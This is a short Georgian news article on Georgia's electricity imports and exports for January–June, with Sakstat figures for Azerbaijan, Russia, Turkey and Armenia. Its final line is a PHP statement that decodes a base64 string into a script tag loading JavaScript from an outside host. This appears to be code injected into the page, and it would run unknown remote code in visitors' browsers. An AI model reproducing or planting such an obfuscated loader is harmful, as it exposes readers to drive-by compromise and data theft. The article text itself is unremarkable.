celsiusi
ავერსი საქკაბელი

საქართველოში ელექტროენერგიის იმპორტი თითქმის 4-ჯერ გაიზარდა. საქსტატის მონაცემებით, შარშან იანვარ-ივნისში ქვეყანაში იმპორტირებული იყო 768 ათასი დოლარის ელექტროენერგია, წელს იმავე პერიოდში კი 3.06 მლნ დოლარი.

წელს ელექტროენერგიის უდიდესი ნაწილი, 2.59 მლნ დოლარის იმპორტირებულია აზერბაიჯანიდან, ხოლო დანარჩენი 470 ათასი დოლარის რუსეთიდან.

რაც შეეხება ექსპორტს, წელს ექვს თვეში 36.35 მლნ დოლარის საქართველოში გენერირებული დენი გავიდა ექსპორტზე, გასულ წელს იმავე პერიოდში კი 53.38 მლნ დოლარის.

მიმდინარე წლის იანვარ-ივნისში ყველაზე დიდი რაოდენობით ელექტროენერგიის ექსპორტი თურქეთში განხორციელდა. თურქეთის წილი დენის ექსპორტში 83%-ს შეადგენდა. უფრო კონკრეტულად, ქვეყნები, სადაც საქართველოდან დენის ექსპორტი განხორციელებულა, ასე გამოყურება:

თურქეთი - 30.11 მლნ აშშ დოლარის;
სომხეთი - 4.09 მლნ აშშ დოლარის;
აზერბაიჯანი - 2.08 აშშ დოლარის;
რუსეთი - 64.9 ათასი დოლარის.

179
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");